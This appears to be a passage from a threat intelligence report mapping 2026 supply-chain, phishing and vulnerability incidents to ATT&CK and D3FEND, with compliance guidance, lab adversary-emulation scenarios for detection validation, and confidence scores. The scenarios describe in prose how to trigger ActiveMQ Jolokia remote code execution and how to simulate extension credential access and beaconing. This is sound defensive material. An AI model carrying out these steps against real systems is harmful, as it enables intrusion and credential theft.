Extension marketplace and PyPI package distribution weaponized; OAuth trust chain exploited as supply chain pivot

T1528

Steal Application Access Token

Vercel and Context.AI

Lumma Stealer exfiltrated active OAuth tokens from employee machine

T1199

Trusted Relationship

Vercel and Context.AI

OAuth integration granted broad scope by Vercel employee leveraged as lateral movement path

T1564.001

Hide Artifacts: Hidden Files

GlassWorm

Invisible Unicode characters conceal malicious logic in extension source code

T1071.001

Application Layer Protocol: Web Protocols

GlassWorm

Solana blockchain RPC API used as command and control channel over HTTPS

T1552.001

Unsecured Credentials: Credentials in Files

GlassWorm

Payload targets SSH key directories and browser credential databases on developer workstations

T1552.004

Unsecured Credentials: Private Keys

elementary-data

Infostealer payload targets cloud credentials, SSH keys, and API tokens accessible to pipeline processes

T1553.002

Subvert Trust Controls: Code Signing

elementary-data

Forged signed GitHub release using exfiltrated GITHUB_TOKEN makes malicious 0.23.3 appear as legitimate maintainer-signed build

T1565.002

Data Manipulation: Transmitted Data

SharePoint CVE-2026-32201

Spoofing allows unauthorized view and modification of SharePoint content

T1566.001

Phishing: Spearphishing Attachment

Excel CVE-2009-0238

Maliciously crafted Excel file delivered as email attachment triggers legacy RCE

T1566.004

Phishing: Spearphishing Voice

ShinyHunters ADT

Vishing call against ADT employee or helpdesk to obtain Okta SSO credentials

T1068

Exploitation for Privilege Escalation

Defender CVE-2026-33825

Local user escalates to SYSTEM via Defender signature update process abuse

T1078

Valid Accounts

ShinyHunters ADT

Compromised Okta SSO credentials used to access Salesforce without technical exploit

T1530

Data from Cloud Storage

ShinyHunters ADT

Salesforce CRM bulk data extraction of 5.5 million customer records via compromised identity

T1210

Exploitation of Remote Services

Windows TCP/IP CVE-2026-33827, AD CVE-2026-33826

Network-reachable unauthenticated and authenticated RCE surfaces; no confirmed exploitation at report date

D3FEND Countermeasures by Incident:

D3FEND ID

Technique

Applicable Incidents

D3-NTF

Network Traffic Filtering

Block Jolokia endpoint externally (ActiveMQ); block SimpleHelp and MagicINFO admin ports

D3-SCF

Service Call Filtering

Restrict BrokerService MBean exec operations via jolokia-access.xml

D3-PA

Process Ancestry Analysis

Detect shells spawned from ActiveMQ JVM, MagicINFO service, or Defender components

D3-SBV

Software Binary Attestation

Verify extension integrity (GlassWorm); verify PyPI package provenance (elementary-data); verify Defender platform version

D3-UA

User Account Analysis

Monitor OAuth authorization changes; detect Okta credential resets and unusual CRM access

D3-MFA

Multi-Factor Authentication

Enforce phishing-resistant MFA on Okta SSO to prevent vishing-driven credential theft

D3-OAA

Network Isolation

Isolate D-Link DIR-823X from sensitive network segments pending decommission

Tactic Summary:
Initial Access: T1190, T1195.002, T1566.001, T1566.004, T1199
Execution: T1059.007, T1059.004
Persistence: T1505.003
Privilege Escalation: T1068
Defense Evasion: T1564.001, T1553.002
Credential Access: T1528, T1552.001, T1552.004
Collection: T1530, T1565.002
Command and Control: T1071.001
Impact: Not confirmed in any registered source for any incident in this window.

Chapter 05 - Governance, Risk & Compliance

GlassWorm and elementary-data: Software Supply Chain Governance and Vendor Risk

These incidents expose a governance gap that most organizations have not formally addressed: developer tooling and open source package ecosystems are not treated as part of the vendor risk management framework, yet they represent a direct injection path into production systems and signed artifacts.

Applicable frameworks and obligations: SOC 2 Type II (CC9.2, third-party risk management); ISO 27001 (Annex A.15, supplier relationships); NIST SSDF (Supply-Chain Security practices RV.1, RV.2, RV.3); US EO 14028 Software Security requirements; FedRAMP (SA-12, Supply Chain Protection). Organizations operating under these frameworks that experienced GlassWorm extension compromise or elementary-data pipeline exposure should assess whether a material breach notification obligation is triggered based on the data types accessible to the compromised environment.

Risk register entry recommended: Add IDE extension ecosystem and CI/CD package dependencies as formal third-party risk entries. Establish an extension and package allowlisting policy as a mitigating control. Define a maximum review period (recommended 30 days) for any new package or extension entering the approved list.

Board-level communication: Frame as a software supply chain control gap, not a patching failure. The risk is structural: organizations grant implicit trust to the open source ecosystem and developer tooling layer without applying the same scrutiny they apply to enterprise software vendors.

Apache ActiveMQ CVE-2026-34197 and CISA KEV Expansion: Regulatory Compliance Obligations

For FCEB agencies: BOD 22-01 requires remediation of CVE-2026-34197 by 30 April 2026 and of CVE-2024-57726, CVE-2024-57728, CVE-2024-7399, and CVE-2025-29635 by 8 May 2026. Failure to remediate or document an approved exception by those dates constitutes a BOD 22-01 compliance violation.

For private sector organizations: while BOD 22-01 deadlines do not apply directly, organizations operating under FedRAMP authorization, FISMA-adjacent contractual obligations, or sector-specific frameworks (NERC CIP for energy, HIPAA for healthcare, PCI DSS for payment processing) should treat CISA KEV listings as presumptive evidence of risk requiring compensating controls documentation if patching cannot be completed immediately.

D-Link DIR-823X end-of-life status has specific vendor risk management implications: any organization that procured this device under a vendor contract that included support or security patch commitments should review that contract for breach implications. EOL acknowledgment by CISA constitutes confirmation that the device cannot be made secure; continued operation in any regulated environment is an unacceptable residual risk that must be documented and escalated to risk ownership.

Microsoft KEV Cluster: SharePoint Data Governance and Excel Attachment Policy

CVE-2026-32201 active exploitation of SharePoint has potential data breach notification implications for organizations where SharePoint hosts personal data subject to GDPR, CCPA, HIPAA, or similar privacy regulations. Organizations should assess whether unauthorized access to SharePoint content during the exploitation window constitutes a reportable data incident. GDPR Article 33 requires notification to the supervisory authority within 72 hours of becoming aware of a breach involving personal data.

CVE-2009-0238 (Excel legacy RCE) reactivation in the threat landscape justifies a formal review of the organization's email attachment policy. Organizations that do not block .xls and .xlsb files from external senders, or that do not enforce Protected View for externally sourced Office documents, carry a preventable control gap that is explicitly confirmed as actively exploited by CISA.

ShinyHunters ADT and Medtronic: PII Breach Notification and Identity Risk

ADT's confirmed exposure of personal data for 5.5 million individuals triggers multi-jurisdictional breach notification obligations. For individuals whose last four digits of SSN or Tax ID were exposed, the risk of identity fraud is elevated, and notification letters must include identity monitoring service offerings under most US state breach notification laws. Medtronic's ongoing investigation means the notification timeline for any personal data exposure is still open.

For peer organizations: review breach notification readiness procedures for a scenario in which a single compromised SSO identity enables exfiltration of millions of CRM records. Specifically: does your incident response plan account for a vishing attack against a non-technical employee as the initial access vector? Is there a documented process for detecting and responding to bulk Salesforce data exports initiated by a compromised identity? Is your legal team briefed on the notification timelines for consumer-facing PII datasets of this scale?

Cyber insurance implications: The ADT and Medtronic breaches are likely to generate large claims under cyber liability policies. Organizations should review policy language regarding social engineering exclusions, particularly whether vishing attacks are explicitly covered. Some policies exclude losses arising from voluntary disclosure of credentials under social engineering scenarios.

Vercel and Context.AI: Third-Party Risk and OAuth Governance

This incident should be added as a case study to any organization's third-party risk management framework for SaaS and AI tool onboarding. The core governance failure was the absence of an OAuth app review process that would have assessed whether a productivity tool like Context.AI needed Google Drive read access, and whether the granting of that access by an individual employee without IT security review was an acceptable risk.

Organizations subject to SOC 2, ISO 27001, or FedRAMP should review whether their third-party risk management controls explicitly address OAuth integration scope and the risks of an employee-granted, broad-scope, AI productivity tool integration as a lateral movement path into corporate infrastructure.

Chapter 06 - Adversary Emulation

All scenarios below are intended for authorized use in controlled lab or staging environments only. No scenario should be executed against production systems. Indicators of execution should be benign and reversible. Red team and blue team actions are presented together to enable coordinated detection validation. References to detection logic apply to the rules and queries documented in the Detection Intelligence section of this report.

Scenario 1: Apache ActiveMQ CVE-2026-34197 Jolokia RCE Detection Validation

Objective: Validate that detection controls fire on Jolokia endpoint exploitation and Spring context injection before the April 30 patch deadline.

Prerequisites: A non-production ActiveMQ Classic instance running a vulnerable version in an isolated lab network. Web server logging enabled and ingested into the SIEM. Network monitoring capturing outbound connections from the ActiveMQ host. Process creation telemetry from the ActiveMQ server endpoint.

Red team actions:

  1. Confirm the Jolokia endpoint is accessible at /api/jolokia/ by sending a GET request. A 200 response with JSON broker state output confirms the endpoint is live and the attack surface is present.

  2. Authenticate to the ActiveMQ web console using test environment credentials.

  3. Send a crafted POST to /api/jolokia/exec/ with an addNetworkConnector argument containing a brokerConfig URI pointing to a controlled internal HTTP server hosting a benign Spring XML payload. The benign payload should write a timestamp file to a temp directory to confirm execution without taking any hostile action on the lab environment.

  4. Observe whether the ActiveMQ JVM process makes an outbound HTTP GET to the controlled server to fetch the XML.

  5. Confirm whether the temp file was written, indicating successful Spring bean factory execution.

Blue team validation gates:
Gate 1: Does the Jolokia POST SIGMA rule documented in the Detection Intelligence section fire in the SIEM within the defined alert SLA? If not, confirm that ActiveMQ HTTP access logging is enabled and that the log source is fully ingested and parsed.
Gate 2: Does network monitoring generate an alert on the outbound GET request from the ActiveMQ JVM process to the controlled internal server? If not, review whether outbound connections from service account processes on this host are being captured by the network visibility layer.
Gate 3: Does the JVM child process SIGMA rule fire if the benign Spring payload spawns any child process from the Java executable?

Success criteria: All three gates fire before any analyst manually observes the activity. Any gate that fails is a detection coverage gap requiring remediation before the April 30 deadline. Document all gaps with assigned owner and remediation timeline.

Scenario 2: GlassWorm IDE Process Anomaly Detection Validation

Objective: Validate detection of IDE process network anomalies and credential file access consistent with GlassWorm payload behavior without deploying any actual malware.

Prerequisites: A sandboxed developer workstation with VS Code installed. EDR telemetry from the workstation ingested into the SIEM. Network traffic logging capturing outbound connections from the workstation. A controlled domain simulating a Solana RPC-style endpoint.

Red team actions:

  1. Write a minimal VS Code extension that makes a single outbound HTTPS GET to a controlled domain mimicking a Solana RPC hostname structure. Use a domain you control. Do not use the real Solana API to avoid contaminating the production network baseline.

  2. Have the extension attempt to read a test file placed in the .ssh directory of the test user's home folder to simulate the credential file access behavior documented in the GlassWorm payload analysis.

  3. Install and activate the extension in the sandboxed environment and confirm both actions execute without error.

Blue team validation gates:
Gate 1: Does the IDE to Solana RPC SIGMA rule documented in the Detection Intelligence section fire in the SIEM on the outbound connection from the extension host process?
Gate 2: Does the EDR alert on file access to the .ssh directory from the VS Code extension host process?
Gate 3: Does the network monitoring solution flag the outbound connection from Code.exe or the extensionHost process to the controlled domain?

Success criteria: All three gates fire. Any gap indicates a visibility deficit in developer workstation monitoring. Prioritize gap remediation immediately given GlassWorm Wave 2 is active in the wild.

Scenario 3: ShinyHunters Okta Vishing Chain Detection Validation

Objective: Validate that the correlation between an Okta credential reset event and a subsequent Salesforce bulk data access event fires within the defined detection window.

Prerequisites: Okta system logs ingested into the SIEM. Salesforce event logs ingested into the SIEM. The Okta reset and Salesforce bulk export correlation query documented in the Detection Intelligence section deployed as a saved search or scheduled correlation rule.

Red team actions:

  1. In a staging Okta tenant, simulate a password reset for a test user account that also has access to a staging Salesforce sandbox.

  2. Within two hours of the Okta reset event, log into the staging Salesforce sandbox as the test user and generate a report export or list view export event.

  3. Confirm both events appear in their respective log sources with the correct event type values expected by the correlation logic.

Blue team validation gates:
Gate 1: Does the SIEM ingest both the Okta reset event and the Salesforce export event within the expected ingestion latency?
Gate 2: Does the correlation rule fire and produce a unified alert joining the two events on the shared user identity within the four-hour correlation window?
Gate 3: Does the resulting alert include sufficient context, including user identity, source IP, event types, and timestamps, for an analyst to make an immediate triage decision without pivoting to additional sources?

Success criteria: Alert fires with full context within the detection SLA. If the correlation fails because Salesforce event logs are not ingested, treat this as a Priority 1 log ingestion gap. The confirmed ShinyHunters ADT methodology makes Salesforce event log visibility a non-negotiable detection requirement for any organization running this platform with consumer PII.

Scenario 4: Microsoft Defender EoP CVE-2026-33825 SYSTEM Process Spawn Detection

Objective: Validate detection of SYSTEM-level process spawning from Microsoft Defender components in environments not yet auto-updated to platform version 4.18.26030.3011.

Prerequisites: An endpoint running a Defender platform version below 4.18.26030.3011 in a lab environment. Process creation telemetry with integrity level logging ingested into the SIEM.

Red team actions:

  1. Confirm the Defender platform version on the lab endpoint is below 4.18.26030.3011 using Get-MpComputerStatus and noting the AMProductVersion value.

  2. Simulate the post-exploitation condition by running a benign command such as whoami from a SYSTEM token context using an authorized test tool to confirm that SYSTEM-level child process spawning from a Defender-adjacent parent process triggers the detection rule.

  3. Do not attempt actual CVE exploitation. The objective is solely to validate that the detection logic fires when the parent-child process combination and integrity level conditions are met.

Blue team validation gates:
Gate 1: Does the Defender EoP SIGMA rule from the Detection Intelligence section fire in the SIEM on the SYSTEM-level process spawn from a Defender component?
Gate 2: Does a Get-MpComputerStatus inventory sweep produce a complete list of endpoints below the patched version threshold?

Success criteria: Detection fires. All endpoints confirmed at or above platform version 4.18.26030.3011. Any gap in the update inventory triggers an immediate manual push action to the affected endpoints.

Scenario 5: elementary-data 0.23.3 Dependency Detection in CI Pipelines

Objective: Validate that software composition analysis tooling and CI log monitoring detects the presence of the malicious elementary-data version string before any pipeline executes it.

Prerequisites: Software composition analysis tooling integrated into the CI pipeline with the ability to block or flag known malicious package versions. SIEM ingesting CI job logs. The elementary-data detection query from the Detection Intelligence section deployed as a saved search.

Red team actions:

  1. In a staging CI pipeline, add elementary-data==0.23.3 to a requirements.txt file without actually executing a pip install that would fetch the package from PyPI. The goal is to test detection of the version string in dependency manifests, not to install the malicious package.

  2. Trigger a CI pipeline run that reads the requirements.txt file and passes it to the software composition analysis tooling.

  3. Confirm the pipeline log contains the version string and that the SCA tooling processes the manifest.

Blue team validation gates:
Gate 1: Does the SCA tooling flag elementary-data==0.23.3 as a malicious or blocked package version before the pipeline proceeds to the install step?
Gate 2: Does the SIEM query fire on the version string appearing in the CI log?
Gate 3: Does the alert reach the on-call security engineer within the defined SLA?

Success criteria: SCA blocks the install and the SIEM alerts on the version string. If the SCA tooling does not have the malicious version in its database, submit the package identifier to the SCA vendor and add a manual blocklist entry immediately. Do not wait for the vendor's database to update before taking the blocking action.

Intelligence Confidence78%

Incident

Score

Rationale

Apache ActiveMQ CVE-2026-34197

92

CISA KEV authoritative base of 90. NVD record confirmed. BleepingComputer and The Hacker News corroboration adds 5. No conflicts across sources.

CISA KEV Expansion (SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X)

90

CISA KEV authoritative base of 90. SecurityWeek and The Hacker News corroboration adds 5. No conflicts.

Microsoft SharePoint CVE-2026-32201 and Excel CVE-2009-0238

90

CISA KEV authoritative base of 90. BleepingComputer and The Hacker News corroboration adds 5. Consistent across both source versions. No conflicts.

Microsoft Defender CVE-2026-33825

78

CrowdStrike elevated base of 75. BleepingComputer corroboration adds 5. No exploitation conflict present.

Microsoft TCP/IP CVE-2026-33827 and Active Directory CVE-2026-33826

75

CrowdStrike elevated base of 75. No additional registered source corroboration. No confirmed exploitation at report date.

ShinyHunters ADT and Medtronic

70

BleepingComputer standard base of 55. Victim self-disclosure corroboration adds 5. Have I Been Pwned independent dataset confirmation adds 5. Medtronic data scope still under investigation subtracts 5.

GlassWorm OpenVSX Sleeper Wave

65

BleepingComputer and The Hacker News standard base of 55. Multiple non-registry corroborating sources (Socket Security, VicOne, Koi Security, Aikido) add 10 contextual weight. Absence of a CISA advisory or T1 registered research confirmation within the window subtracts 5.

elementary-data PyPI Backdoor

65

BleepingComputer standard base of 55. StepSecurity non-registry corroboration adds 5. Artifact IOCs are directly actionable. No T1 registered source confirmation within the window.

Vercel and Context.AI OAuth Supply Chain

52

No T1 or registered primary source. Vercel self-disclosure adds 5 for victim-side confirmation. Trend Micro and OX Security non-registry base of 35. Attribution unconfirmed subtracts 10. BreachForums active listing corroborates exfiltration and adds 5.